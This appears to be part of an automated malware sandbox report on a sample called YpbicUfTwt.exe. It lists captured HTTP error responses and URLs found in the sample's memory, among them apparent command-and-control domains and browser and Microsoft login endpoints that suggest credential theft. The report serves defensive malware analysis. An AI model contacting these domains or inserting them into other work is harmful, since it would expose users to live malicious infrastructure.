                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 26 Nov 2024 08:29:23 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- 
a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 26 Nov 2024 08:29:26 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- 
a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:29:32 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:29:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:29:38 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 26 Nov 2024 08:29:41 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 26 Nov 2024 08:29:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q317PC9xk8DkBeujY9mlBokcwRJQbPsT%2BlPW35RGYBfG3T9Gm9kltMhSdVNgx2lqM9%2BX3Wcd7dCVQfGak2zC%2FQHtJ17rBjKRCfkyH91%2B1aXmiO5hISP%2FtASdxMsoEu%2FlClF4T2zoWQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e888346fb1a42b0-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1537&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=719&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 45 97 43 36 a2 e0 c2 95 27 48 9c b1 09 a4 93 32 66 61 6f 2f 55 0b e2 da a5 ab 07 ef e7 e3 61 ac 43 76 6d 83 91 3d 39 ac a9 66 76 db f5 06 0e 45 43 22 62 41 fb 32 d1 3e 2b 6d 83 a1 d0 34 eb 85 a5 b2 3a 8c dd f7 22 76 0e ed 3b 9e d9 ea 96 b2 f4 49 ee 9f 99 5d 68 76 79 b2 32 06 3c 8c 9e 28 49 0f b5 00 a5 9b 0f 99 e1 74 3e ee c1 0b c1 2e 6a 19 18 ae 9a 58 28 4f c0 aa 45 61 f4 3d 83 31 7f c4 af 11 0f 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a6M0a<@EC6'H2fao/UaCvm=9fvEC"bA2>+m4:"v;I]hvy2<(It>.jX(OEa=1[0$0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 26 Nov 2024 08:29:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kzSX5KwzPEehZwDaykoMuLeNcZsKzStc9zadiFs5COioq0Rs9RatAy%2FlHHqce8rviVhARPv%2F1hZh19XhBlvrzBxOKSOZjOs%2FE2L2t1vQUwpEPclPLPPFQL%2BVBjVJyI20qs%2BT%2B9TMFQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e888357e93e4379-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2132&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=739&delivery_rate=0&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 45 97 43 36 a2 e0 c2 95 27 48 9c b1 09 a4 93 32 66 61 6f 2f 55 0b e2 da a5 ab 07 ef e7 e3 61 ac 43 76 6d 83 91 3d 39 ac a9 66 76 db f5 06 0e 45 43 22 62 41 fb 32 d1 3e 2b 6d 83 a1 d0 34 eb 85 a5 b2 3a 8c dd f7 22 76 0e ed 3b 9e d9 ea 96 b2 f4 49 ee 9f 99 5d 68 76 79 b2 32 06 3c 8c 9e 28 49 0f b5 00 a5 9b 0f 99 e1 74 3e ee c1 0b c1 2e 6a 19 18 ae 9a 58 28 4f c0 aa 45 61 f4 3d 83 31 7f c4 af 11 0f 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a6M0a<@EC6'H2fao/UaCvm=9fvEC"bA2>+m4:"v;I]hvy2<(It>.jX(OEa=1[0$0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 26 Nov 2024 08:29:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKhB57a8n8D5b70YlKyg78E8H4%2BFPK39SaU39fr9i1K64zzhxuNrpJJERYiTaT22AsfseSK9pzjAstZZck19q3gGpAP5UiOrUr71qYucymWzil0lh1v2CRZz277W2V3XL6C0yvqiSQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e8883689fbc42ab-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1647&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1756&delivery_rate=0&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 26 Nov 2024 08:29:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TPIZitb%2F5CIawpRDyT03ewKyYU1QYVC6KkknVeQ2eQ%2BviijUHj6bW827MwRmk3xnaYBo2KPONeQ8x3N0xYkI0Qn0NW4qSdtMXCrD7aqUgT9Ynn1RgE778l0Oax2IR3rkCdi70KnlbA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e88837ada2872b6-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1800&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=456&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 
64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: YpbicUfTwt.exe, 00000007.00000002.3865989919.0000000005858000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.fengzheng.shop
                      Source: YpbicUfTwt.exe, 00000007.00000002.3865989919.0000000005858000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.fengzheng.shop/plc2/
                      Source: find.exe, 00000005.00000002.3865918446.00000000048A8000.00000004.10000000.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863853162.0000000004748000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.regislemberthe.online/px.js?ch=1
                      Source: find.exe, 00000005.00000002.3865918446.00000000048A8000.00000004.10000000.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863853162.0000000004748000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.regislemberthe.online/px.js?ch=2
                      Source: find.exe, 00000005.00000002.3865918446.00000000048A8000.00000004.10000000.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863853162.0000000004748000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.regislemberthe.online/sk-logabpstatus.php?a=alFjTmVnTnFFNS9SV3Y0RDlHR3BoMWZmc2gvcGRoa1Fye
                      Source: find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: find.exe, 00000005.00000002.3865918446.0000000003F3C000.00000004.10000000.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863853162.0000000003DDC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                      Source: find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: YpbicUfTwt.exe, 00000007.00000002.3863853162.0000000004748000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                      Source: find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: find.exe, 00000005.00000002.3865918446.0000000003F3C000.00000004.10000000.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863853162.0000000003DDC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://imweb.me/login
                      Source: find.exe, 00000005.00000002.3858129273.0000000000A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: find.exe, 00000005.00000002.3858129273.0000000000A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: find.exe, 00000005.00000003.1762736872.00000000076C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                      Source: find.exe, 00000005.00000002.3858129273.0000000000A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: find.exe, 00000005.00000002.3858129273.0000000000A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Ac
                      Source: find.exe, 00000005.00000002.3858129273.0000000000A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: find.exe, 00000005.00000002.3858129273.0000000000A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: find.exe, 00000005.00000002.3865918446.0000000004A3A000.00000004.10000000.00040000.00000000.sdmp, find.exe, 00000005.00000002.3867588890.0000000005C20000.00000004.00000800.00020000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863853162.00000000048DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
